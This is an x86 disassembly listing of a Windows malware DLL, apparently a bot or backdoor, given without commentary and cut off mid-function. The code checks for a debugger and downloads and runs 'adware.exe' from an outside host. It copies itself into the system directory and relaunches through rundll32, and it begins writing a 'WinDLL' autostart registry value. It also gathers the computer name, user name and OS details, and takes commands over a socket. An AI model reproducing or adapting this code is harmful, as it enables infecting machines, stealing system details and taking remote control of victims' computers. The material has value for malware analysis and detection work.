Dst = byte ptr -40Ch
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
Dest = byte ptr -204h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1810h
call __alloca_probe
push ebx
push esi
push edi
push eax
mov eax, large fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
test eax, eax
jnz short loc_10004231
jmp short $+2
loc_10004231: ; CODE XREF: start+20�j
pop eax
push 0
push 0
push 0
push 0
push offset aWebreader ; "WebReader"
call ds:InternetOpenA ; InternetOpenA
mov [ebp+var_4], eax
push 0
push 0
push 0
push 0
push offset aHttpAdware_rxm ; "http://adware.rxmods.net/adware.exe"
mov eax, [ebp+var_4]
push eax
call ds:InternetOpenUrlA ; InternetOpenUrlA
mov [ebp+var_20C], eax
push offset Mode ; "wb"
push offset aCAdware_exe ; "c:\\adware.exe"
call ds:fopen ; fopen
add esp, 8
mov [ebp+File], eax
loc_1000427E: ; CODE XREF: start+BB�j
lea ecx, [ebp+Count]
push ecx
push 62h
lea edx, [ebp+Str]
push edx
mov eax, [ebp+var_20C]
push eax
call ds:InternetReadFile ; InternetReadFile
test eax, eax
jz short loc_100042CA
cmp [ebp+Count], 0
jz short loc_100042CA
mov ecx, [ebp+File]
push ecx ; File
mov edx, [ebp+Count]
push edx ; Count
push 1 ; Size
lea eax, [ebp+Str]
push eax ; Str
call ds:fwrite ; fwrite
add esp, 10h
jmp short loc_1000427E
; ---------------------------------------------------------------------------
loc_100042CA: ; CODE XREF: start+90�j start+99�j
mov ecx, [ebp+File]
push ecx ; File
call ds:fclose ; fclose
add esp, 4
push 1 ; nShowCmd
push 0 ; lpDirectory
push 0 ; lpParameters
push offset File ; "c:\\adware.exe"
push offset Operation ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
push 2 ; uMode
call ds:SetErrorMode ; SetErrorMode
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
call sub_1000504C
call sub_10004CE4
call sub_1000ABF3
push 7530h ; dwMilliseconds
push offset Name ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call ds:CreateMutexA ; CreateMutexA
push eax ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
cmp eax, 102h
jnz short loc_10004340
jmp loc_1000457A
; ---------------------------------------------------------------------------
loc_10004340: ; CODE XREF: start+12C�j
push 10h ; Size
push 0 ; Val
push offset Dest ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; Size
push 0 ; Val
push offset byte_1002C5D8 ; Dst
call memset ; memset
add esp, 0Ch
push 80h ; Size
push 0 ; Val
push offset byte_10012A70 ; Dst
call memset ; memset
add esp, 0Ch
push 200h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
test eax, eax
jz short loc_100043A7
jmp loc_1000457A
; ---------------------------------------------------------------------------
loc_100043A7: ; CODE XREF: start+193�j
call sub_10004BB5
loc_100043AC: ; CODE XREF: start+1B8�j
call sub_10007005
and eax, 0FFh
test eax, eax
jnz short loc_100043C7
push 1388h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_100043AC
; ---------------------------------------------------------------------------
loc_100043C7: ; CODE XREF: start+1AB�j
; start:loc_10004423�j ...
mov ecx, 1
test ecx, ecx
jz loc_1000457A
push 0 ; flags
push 1000h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, s
push eax ; s
call ds:recv ; recv
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jg short loc_10004425
push 1388h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_10004408: ; CODE XREF: start+214�j
call sub_10007005
and eax, 0FFh
test eax, eax
jnz short loc_10004423
push 1388h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10004408
; ---------------------------------------------------------------------------
loc_10004423: ; CODE XREF: start+207�j
jmp short loc_100043C7
; ---------------------------------------------------------------------------
loc_10004425: ; CODE XREF: start+1EE�j
mov ecx, [ebp+var_618]
mov [ebp+ecx+buf], 0
push 0Ah
lea edx, [ebp+buf]
push edx
call sub_10004581
add esp, 8
mov [ebp+var_208], eax
mov [ebp+var_410], 0
jmp short loc_10004465
; ---------------------------------------------------------------------------
loc_10004456: ; CODE XREF: start+338�j start+363�j
mov eax, [ebp+var_410]
add eax, 1
mov [ebp+var_410], eax
loc_10004465: ; CODE XREF: start+247�j
mov ecx, [ebp+var_410]
cmp ecx, [ebp+var_208]
jge loc_10004575
push 200h ; Count
push 0Ah
mov edx, [ebp+var_410]
add edx, 1
push edx
lea eax, [ebp+buf]
push eax
call sub_10004799
add esp, 0Ch
push eax ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
movsx edx, [ebp+Dst]
test edx, edx
jz short loc_1000450D
lea eax, [ebp+Dest]
push eax
lea ecx, [ebp+Dst]
push ecx
push offset aSS_2 ; "%s%s"
push 200h ; Count
lea edx, [ebp+Source]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push 200h ; Count
lea eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 200h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
loc_1000450D: ; CODE XREF: start+2A4�j
lea eax, [ebp+Dest]
push eax ; Str
call strlen ; strlen
add esp, 4
movsx ecx, byte ptr [ebp+eax+var_208+3]
cmp ecx, 0Dh
jz short loc_1000454A
push 200h ; Count
lea edx, [ebp+Dest]
push edx ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp loc_10004456
; ---------------------------------------------------------------------------
loc_1000454A: ; CODE XREF: start+31A�j
lea ecx, [ebp+Dest]
push ecx ; Str
call strlen ; strlen
add esp, 4
mov byte ptr [ebp+eax+var_208+3], 0
lea edx, [ebp+Dest]
push edx ; Str
call sub_10007424
add esp, 4
jmp loc_10004456
; ---------------------------------------------------------------------------
loc_10004575: ; CODE XREF: start+264�j
jmp loc_100043C7
; ---------------------------------------------------------------------------
loc_1000457A: ; CODE XREF: start+12E�j start+195�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004581 proc near ; CODE XREF: start+22F�p
; sub_10007424+3D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 0
mov [ebp+var_C], 0
mov byte ptr [ebp+var_4], 0
jmp short loc_100045A4
; ---------------------------------------------------------------------------
loc_1000459B: ; CODE XREF: sub_10004581:loc_100045FF�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_100045A4: ; CODE XREF: sub_10004581+18�j
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_10004601
mov eax, [ebp+var_4]
and eax, 0FFh
test eax, eax
jz short loc_100045D4
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
movsx eax, [ebp+arg_4]
cmp edx, eax
jnz short loc_100045D4
mov byte ptr [ebp+var_4], 0
jmp short loc_100045FF
; ---------------------------------------------------------------------------
loc_100045D4: ; CODE XREF: sub_10004581+3A�j
; sub_10004581+4B�j
mov ecx, [ebp+var_4]
and ecx, 0FFh
test ecx, ecx
jnz short loc_100045FF
mov edx, [ebp+arg_0]
add edx, [ebp+var_8]
movsx eax, byte ptr [edx]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jz short loc_100045FF
mov byte ptr [ebp+var_4], 1
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_100045FF: ; CODE XREF: sub_10004581+51�j
; sub_10004581+5E�j ...
jmp short loc_1000459B
; ---------------------------------------------------------------------------
loc_10004601: ; CODE XREF: sub_10004581+2E�j
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_10004581 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004608 proc near ; CODE XREF: sub_10006A3B+22�p
; sub_10006BAC+23�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnz short loc_10004618
mov eax, [ebp+arg_0]
jmp short loc_1000462F
; ---------------------------------------------------------------------------
loc_10004618: ; CODE XREF: sub_10004608+9�j
call ds:rand ; rand
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
add ecx, 1
cdq
idiv ecx
mov eax, edx
add eax, [ebp+arg_0]
loc_1000462F: ; CODE XREF: sub_10004608+E�j
pop ebp
retn
sub_10004608 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004631 proc near ; CODE XREF: sub_10004987+1F1�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
call sub_1000478C
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
call sub_1000478C
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call __aulldiv
push 0
push 0Ah
push edx
push eax
call __aulldiv
mov [ebp+var_8], eax
mov [ebp+var_4], edx
push 0
push 64h
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
push ecx
call __aullrem
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
mov [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_100046B8
jb short loc_100046AA
cmp [ebp+var_18], 50h
jnb short loc_100046B8
loc_100046AA: ; CODE XREF: sub_10004631+71�j
mov [ebp+var_10], 4Bh
mov [ebp+var_C], 0
loc_100046B8: ; CODE XREF: sub_10004631+6F�j
; sub_10004631+77�j
cmp [ebp+var_14], 0
ja short loc_100046D4
jb short loc_100046C6
cmp [ebp+var_18], 47h
jnb short loc_100046D4
loc_100046C6: ; CODE XREF: sub_10004631+8D�j
mov [ebp+var_10], 42h
mov [ebp+var_C], 0
loc_100046D4: ; CODE XREF: sub_10004631+8B�j
; sub_10004631+93�j
cmp [ebp+var_14], 0
ja short loc_100046F0
jb short loc_100046E2
cmp [ebp+var_18], 37h
jnb short loc_100046F0
loc_100046E2: ; CODE XREF: sub_10004631+A9�j
mov [ebp+var_10], 32h
mov [ebp+var_C], 0
loc_100046F0: ; CODE XREF: sub_10004631+A7�j
; sub_10004631+AF�j
cmp [ebp+var_14], 0
ja short loc_1000470C
jb short loc_100046FE
cmp [ebp+var_18], 26h
jnb short loc_1000470C
loc_100046FE: ; CODE XREF: sub_10004631+C5�j
mov [ebp+var_10], 21h
mov [ebp+var_C], 0
loc_1000470C: ; CODE XREF: sub_10004631+C3�j
; sub_10004631+CB�j
cmp [ebp+var_14], 0
ja short loc_10004728
jb short loc_1000471A
cmp [ebp+var_18], 1Eh
jnb short loc_10004728
loc_1000471A: ; CODE XREF: sub_10004631+E1�j
mov [ebp+var_10], 19h
mov [ebp+var_C], 0
loc_10004728: ; CODE XREF: sub_10004631+DF�j
; sub_10004631+E7�j
cmp [ebp+var_14], 0
ja short loc_10004744
jb short loc_10004736
cmp [ebp+var_18], 0Ah
jnb short loc_10004744
loc_10004736: ; CODE XREF: sub_10004631+FD�j
mov [ebp+var_10], 0
mov [ebp+var_C], 0
loc_10004744: ; CODE XREF: sub_10004631+FB�j
; sub_10004631+103�j
mov edx, [ebp+var_8]
sub edx, [ebp+var_18]
mov eax, [ebp+var_4]
sbb eax, [ebp+var_14]
add edx, [ebp+var_10]
adc eax, [ebp+var_C]
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_10004631 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10004763(char *name)
sub_10004763 proc near ; CODE XREF: sub_10007005+1BB�p
; sub_10007424+2DB�p ...
var_4 = dword ptr -4
name = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+name]
push eax ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_1000477E
xor eax, eax
jmp short loc_10004788
; ---------------------------------------------------------------------------
loc_1000477E: ; CODE XREF: sub_10004763+15�j
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
mov eax, [edx]
mov eax, [eax]
loc_10004788: ; CODE XREF: sub_10004763+19�j
mov esp, ebp
pop ebp
retn
sub_10004763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000478C proc near ; CODE XREF: sub_10004631+6�p
; sub_10004631+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_1000478C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004799 proc near ; CODE XREF: start+282�p
; sub_10007398+D�p ...
var_4018 = dword ptr -4018h
var_4014 = dword ptr -4014h
var_4010 = dword ptr -4010h
var_400C = dword ptr -400Ch
var_4008 = byte ptr -4008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 4018h
call __alloca_probe
mov [ebp+var_4010], 0
mov [ebp+var_4018], 0
mov [ebp+var_400C], 0
mov [ebp+var_4014], 0
mov byte ptr [ebp+var_8], 0
jmp short loc_100047E3
; ---------------------------------------------------------------------------
loc_100047D4: ; CODE XREF: sub_10004799:loc_10004926�j
mov eax, [ebp+var_4010]
add eax, 1
mov [ebp+var_4010], eax
loc_100047E3: ; CODE XREF: sub_10004799+39�j
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4010]
movsx edx, byte ptr [ecx]
test edx, edx
jz loc_1000492B
cmp [ebp+var_400C], 20h
jge loc_1000492B
mov eax, [ebp+var_8]
and eax, 0FFh
test eax, eax
jz short loc_10004847
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4010]
movsx edx, byte ptr [ecx]
movsx eax, [ebp+arg_8]
cmp edx, eax
jnz short loc_10004847
mov byte ptr [ebp+var_8], 0
mov ecx, [ebp+var_400C]
shl ecx, 9
lea edx, [ebp+ecx+var_4008]
mov eax, [ebp+var_4018]
mov byte ptr [edx+eax], 0
jmp loc_10004926
; ---------------------------------------------------------------------------
loc_10004847: ; CODE XREF: sub_10004799+75�j
; sub_10004799+89�j
mov ecx, [ebp+var_8]
and ecx, 0FFh
test ecx, ecx
jnz short loc_100048D2
mov edx, [ebp+arg_0]
add edx, [ebp+var_4010]
movsx eax, byte ptr [edx]
movsx ecx, [ebp+arg_8]
cmp eax, ecx
jz short loc_100048D2
mov byte ptr [ebp+var_8], 1
mov edx, [ebp+var_4014]
add edx, 1
mov [ebp+var_4014], edx
cmp [ebp+var_4014], 1
jle short loc_10004893
mov eax, [ebp+var_400C]
add eax, 1
mov [ebp+var_400C], eax
loc_10004893: ; CODE XREF: sub_10004799+E9�j
mov [ebp+var_4018], 0
mov ecx, [ebp+var_400C]
shl ecx, 9
lea edx, [ebp+ecx+var_4008]
mov eax, [ebp+arg_0]
add eax, [ebp+var_4010]
mov ecx, [ebp+var_4018]
mov al, [eax]
mov [edx+ecx], al
mov ecx, [ebp+var_4018]
add ecx, 1
mov [ebp+var_4018], ecx
jmp short loc_10004926
; ---------------------------------------------------------------------------
loc_100048D2: ; CODE XREF: sub_10004799+B9�j
; sub_10004799+CD�j
mov edx, [ebp+var_8]
and edx, 0FFh
test edx, edx
jz short loc_10004926
mov eax, [ebp+arg_0]
add eax, [ebp+var_4010]
movsx ecx, byte ptr [eax]
movsx edx, [ebp+arg_8]
cmp ecx, edx
jz short loc_10004926
mov eax, [ebp+var_400C]
shl eax, 9
lea ecx, [ebp+eax+var_4008]
mov edx, [ebp+arg_0]
add edx, [ebp+var_4010]
mov eax, [ebp+var_4018]
mov dl, [edx]
mov [ecx+eax], dl
mov eax, [ebp+var_4018]
add eax, 1
mov [ebp+var_4018], eax
loc_10004926: ; CODE XREF: sub_10004799+A9�j
; sub_10004799+137�j ...
jmp loc_100047D4
; ---------------------------------------------------------------------------
loc_1000492B: ; CODE XREF: sub_10004799+58�j
; sub_10004799+65�j
mov ecx, [ebp+var_400C]
shl ecx, 9
lea edx, [ebp+ecx+var_4008]
mov eax, [ebp+var_4018]
mov byte ptr [edx+eax], 0
mov ecx, [ebp+arg_4]
sub ecx, 1
shl ecx, 9
lea edx, [ebp+ecx+var_4008]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_10004799 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000495F(char addr)
sub_1000495F proc near ; CODE XREF: sub_10007424+259�p
var_4 = dword ptr -4
addr = byte ptr 8
push ebp
mov ebp, esp
push ecx
push 2 ; type
push 4 ; len
lea eax, [ebp+addr]
push eax ; addr
call ds:gethostbyaddr ; gethostbyaddr
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_1000497E
xor eax, eax
jmp short loc_10004983
; ---------------------------------------------------------------------------
loc_1000497E: ; CODE XREF: sub_1000495F+19�j
mov ecx, [ebp+var_4]
mov eax, [ecx]
loc_10004983: ; CODE XREF: sub_1000495F+1D�j
mov esp, ebp
pop ebp
retn
sub_1000495F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004987 proc near ; CODE XREF: sub_10007424+8AA�p
Buffer = byte ptr -274h
VersionInformation= _OSVERSIONINFOA ptr -174h
var_E0 = dword ptr -0E0h
pcbBuffer = dword ptr -0DCh
nSize = dword ptr -0D8h
Dest = byte ptr -0D4h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 274h
push 100h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_14], eax
mov [ebp+nSize], 10h
mov [ebp+pcbBuffer], 15h
push 100h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea ecx, [ebp+var_50]
push ecx ; lpBuffer
call ds:GlobalMemoryStatus ; GlobalMemoryStatus
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
lea edx, [ebp+VersionInformation]
push edx ; lpVersionInformation
call ds:GetVersionExA ; GetVersionExA
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10004A1E
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_10004A1E
cmp [ebp+VersionInformation.dwPlatformId], 1
jnz short loc_10004A0C
mov [ebp+var_30], offset a95 ; "95"
jmp short loc_10004A1C
; ---------------------------------------------------------------------------
loc_10004A0C: ; CODE XREF: sub_10004987+7A�j
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_10004A1C
mov [ebp+var_30], offset aNt ; "NT"
loc_10004A1C: ; CODE XREF: sub_10004987+83�j
; sub_10004987+8C�j
jmp short loc_10004A91
; ---------------------------------------------------------------------------
loc_10004A1E: ; CODE XREF: sub_10004987+68�j
; sub_10004987+71�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10004A39
cmp [ebp+VersionInformation.dwMinorVersion], 0Ah
jnz short loc_10004A39
mov [ebp+var_30], offset a98 ; "98"
jmp short loc_10004A91
; ---------------------------------------------------------------------------
loc_10004A39: ; CODE XREF: sub_10004987+9E�j
; sub_10004987+A7�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10004A54
cmp [ebp+VersionInformation.dwMinorVersion], 5Ah
jnz short loc_10004A54
mov [ebp+var_30], offset aMe ; "ME"
jmp short loc_10004A91
; ---------------------------------------------------------------------------
loc_10004A54: ; CODE XREF: sub_10004987+B9�j
; sub_10004987+C2�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_10004A6F
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_10004A6F
mov [ebp+var_30], offset a2000 ; "2000"
jmp short loc_10004A91
; ---------------------------------------------------------------------------
loc_10004A6F: ; CODE XREF: sub_10004987+D4�j
; sub_10004987+DD�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_10004A8A
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_10004A8A
mov [ebp+var_30], offset aXp ; "XP"
jmp short loc_10004A91
; ---------------------------------------------------------------------------
loc_10004A8A: ; CODE XREF: sub_10004987+EF�j
; sub_10004987+F8�j
mov [ebp+var_30], offset a??? ; "???"
loc_10004A91: ; CODE XREF: sub_10004987:loc_10004A1C�j
; sub_10004987+B0�j ...
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_10004AD3
movsx eax, [ebp+VersionInformation.szCSDVersion]
test eax, eax
jz short loc_10004AD3
lea ecx, [ebp+VersionInformation.szCSDVersion]
push ecx
mov edx, [ebp+var_30]
push edx
push offset aSS_3 ; "%s (%s)"
push 80h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
lea ecx, [ebp+Dest]
mov [ebp+var_30], ecx
loc_10004AD3: ; CODE XREF: sub_10004987+111�j
; sub_10004987+11C�j
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_54], eax
lea edx, [ebp+nSize]
push edx ; nSize
lea eax, [ebp+var_10]
push eax ; lpBuffer
call ds:GetComputerNameA ; GetComputerNameA
lea ecx, [ebp+var_10]
mov [ebp+var_E0], ecx
lea edx, [ebp+pcbBuffer]
push edx ; pcbBuffer
lea eax, [ebp+var_2C]
push eax ; lpBuffer
call ds:GetUserNameA ; GetUserNameA
mov eax, [ebp+var_54]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 3Ch
div ecx
push eax
mov eax, [ebp+var_54]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
push eax
mov eax, [ebp+var_54]
xor edx, edx
mov ecx, 15180h
div ecx
push eax
lea edx, [ebp+Buffer]
push edx
lea eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_E0]
push ecx
mov edx, [ebp+var_48]
shr edx, 14h
push edx
mov eax, [ebp+var_44]
shr eax, 14h
push eax
call sub_10004631
push eax
mov ecx, [ebp+VersionInformation.dwBuildNumber]
push ecx
mov edx, [ebp+VersionInformation.dwMinorVersion]
push edx
mov eax, [ebp+VersionInformation.dwMajorVersion]
push eax
mov ecx, [ebp+var_30]
push ecx
push offset aOsWindowsSD_DD ; "OS: Windows %s (%d.%d - %d), CPU: %dMHz"...
push 100h ; Count
mov edx, [ebp+var_14]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 40h
mov eax, [ebp+var_14]
mov esp, ebp
pop ebp
retn
sub_10004987 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004BB5 proc near ; CODE XREF: start:loc_100043A7�p
; sub_10007424+8E6�p
Dest = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 100h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dest], eax
push offset byte_10012A70
push offset byte_1002C5D8
push offset Dest
push offset aIpSConnectedFr ; "IP: %s, connected from: %s (%s)"
push 100h ; Count
mov eax, [ebp+Dest]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
mov eax, [ebp+Dest]
mov esp, ebp
pop ebp
retn
sub_10004BB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10004BF7(char *Src)
sub_10004BF7 proc near ; CODE XREF: sub_10007005+185�p
; sub_10007424+217�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_C]
push ecx
lea edx, [ebp+var_8]
push edx
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov ecx, [ebp+Src]
push ecx ; Src
call ds:sscanf ; sscanf
add esp, 18h
cmp [ebp+var_4], 0
jl short loc_10004C5F
cmp [ebp+var_4], 0FFh
jg short loc_10004C5F
cmp [ebp+var_8], 0
jl short loc_10004C5F
cmp [ebp+var_8], 0FFh
jg short loc_10004C5F
cmp [ebp+var_C], 0
jl short loc_10004C5F
cmp [ebp+var_C], 0FFh
jg short loc_10004C5F
cmp [ebp+var_10], 0
jl short loc_10004C5F
cmp [ebp+var_10], 0FFh
jg short loc_10004C5F
mov al, 1
jmp short loc_10004C61
; ---------------------------------------------------------------------------
loc_10004C5F: ; CODE XREF: sub_10004BF7+2C�j
; sub_10004BF7+35�j ...
xor al, al
loc_10004C61: ; CODE XREF: sub_10004BF7+66�j
mov esp, ebp
pop ebp
retn
sub_10004BF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004C65 proc near ; CODE XREF: sub_10007424+EC1�p
; sub_10007424+1010�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
push 0
push 0
call ds:_beginthreadex ; _beginthreadex
add esp, 18h
pop ebp
retn
sub_10004C65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004C83 proc near ; CODE XREF: sub_10007005:loc_10007288�p
namelen = dword ptr -14h
name = sockaddr ptr -10h
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+namelen], 10h
lea eax, [ebp+namelen]
push eax ; namelen
lea ecx, [ebp+name]
push ecx ; name
mov edx, s
push edx ; s
call ds:getsockname ; getsockname
mov eax, dword ptr [ebp+name.sa_data+5]
and eax, 0FFh
push eax
mov ecx, [ebp-0Ah]
and ecx, 0FFh
push ecx
mov edx, [ebp-0Bh]
and edx, 0FFh
push edx
mov eax, [ebp-0Ch]
and eax, 0FFh
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push 10h ; Count
push offset Dest ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov esp, ebp
pop ebp
retn
sub_10004C83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004CE4 proc near ; CODE XREF: start+102�p
Buffer = byte ptr -300h
Parameters = byte ptr -200h
NewFileName = byte ptr -100h
push ebp
mov ebp, esp
sub esp, 300h
push 100h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset dword_1002C5E8
lea ecx, [ebp+Buffer]
push ecx
push offset aSS_4 ; "%s\\%s"
push 100h ; Count
lea edx, [ebp+NewFileName]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push offset ExistingFileName ; Str2
lea eax, [ebp+NewFileName]
push eax ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10004D40
jmp short loc_10004DAD
; ---------------------------------------------------------------------------
loc_10004D40: ; CODE XREF: sub_10004CE4+58�j
; sub_10004CE4+7F�j
push 0 ; bFailIfExists
lea ecx, [ebp+NewFileName]
push ecx ; lpNewFileName
push offset ExistingFileName ; lpExistingFileName
call ds:CopyFileA ; CopyFileA
test eax, eax
jnz short loc_10004D65
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10004D40
; ---------------------------------------------------------------------------
loc_10004D65: ; CODE XREF: sub_10004CE4+72�j
call sub_10004DB1
lea edx, [ebp+NewFileName]
push edx
push offset aSStart ; "%s,start"
push 100h ; Count
lea eax, [ebp+Parameters]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; nShowCmd
push 0 ; lpDirectory
lea ecx, [ebp+Parameters]
push ecx ; lpParameters
push offset aRundll32_exe ; "rundll32.exe"
push offset aOpen_0 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
call sub_10004EA7
; ---------------------------------------------------------------------------
loc_10004DAD: ; CODE XREF: sub_10004CE4+5A�j
mov esp, ebp
pop ebp
retn
sub_10004CE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004DB1 proc near ; CODE XREF: sub_10004CE4:loc_10004D65�p
Buffer = byte ptr -384h
hKey = dword ptr -284h
Data = byte ptr -280h
ValueName = byte ptr -180h
FileName = byte ptr -100h
push ebp
mov ebp, esp
sub esp, 384h
push 100h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset dword_1002C5E8
push offset aWindllS ; "WinDLL (%s)"
push 80h ; Count
lea ecx, [ebp+ValueName]
push ecx ; Dest
